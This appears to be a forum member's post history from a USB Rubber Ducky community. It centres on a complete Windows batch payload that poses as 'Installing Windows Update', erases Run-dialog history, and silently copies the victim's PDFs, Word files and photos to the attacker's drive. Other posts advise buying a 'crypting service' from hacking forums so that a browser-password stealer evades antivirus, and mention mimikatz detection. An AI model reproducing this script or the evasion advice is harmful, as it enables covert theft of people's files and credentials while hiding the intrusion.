felipe
-
Posts
12 -
Joined
-
Last visited
Posts posted by felipe
-
-
-
Need help here.. It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE ?
e.cmd
@echo off
@echo Installing Windows UpdateREM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /fREM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nulif Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul
)REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"@cls
@exit -
6 hours ago, Eanske said:
Is there no other option than that? I mean if something get's crypted by a third party there is no way of knowing if they injected anything else in there..
I mean I know this is already the case with the file but I do find the official hak5 github to be a bit more trustworthy than that..
Also isn't crypting or owning a crypter illegal in the EU?
What is illegal for you? Run a pendrive for grab passwords or crypter service?
I don't know about EU, im from brazil... So, about another way? I don't know, sorry =/
Of course everything in hak5 is trustworthy, and if has that possibility would be perfect.
anyway...I hope I´ve helped. And sorry for my bad english
-
2 hours ago, Eanske said:
Hi, I'm new here so forgive me if I step on anybody's toes right now with my ignorance..
But I have a question, I've been wanting to try this Ducky script right here https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Export-Browser-Passwords-and-email-results
The only problem I seem to be having right now, is that the file that has to be downloaded, bpd.exe, is flagged immediatly, and even 31 out of 50 antivirusses will notice and delete it..
Even smartscreen will block it.
So are we supposed to encode that file first or something? Is there an online tool for that around here?
Otherwise I don't see how that script can be successful...
Buy an "Crypting Service" for you... Google: Crypting Service
or go around like hackforums and others.
And before purchasing some shit, read about scantime, runtime, dependencies etc...
-
I am experiencing exactly the problem that you have mentioned about the support of hak5.
my order is: #92373 purchased rubber duck 16/12
i know, its backordered... but i asked about udpate personal info (like fullname and taxid)...I haven't seen any field asking my tax id and that matter for brazil a lot.
and now i got another question, it´s possible the rubber ducky comes with Duck Twin Exfiltration files working on(pt-br)?
sorry for my bad english and thanks a lot
Merry Christmas for all
Mr. Robot Hack (optimized payload)
in Classic USB Rubber Ducky
Posted · Edited by felipe
unfortunately mimikatz got detected.
do not upload anything to virustotal.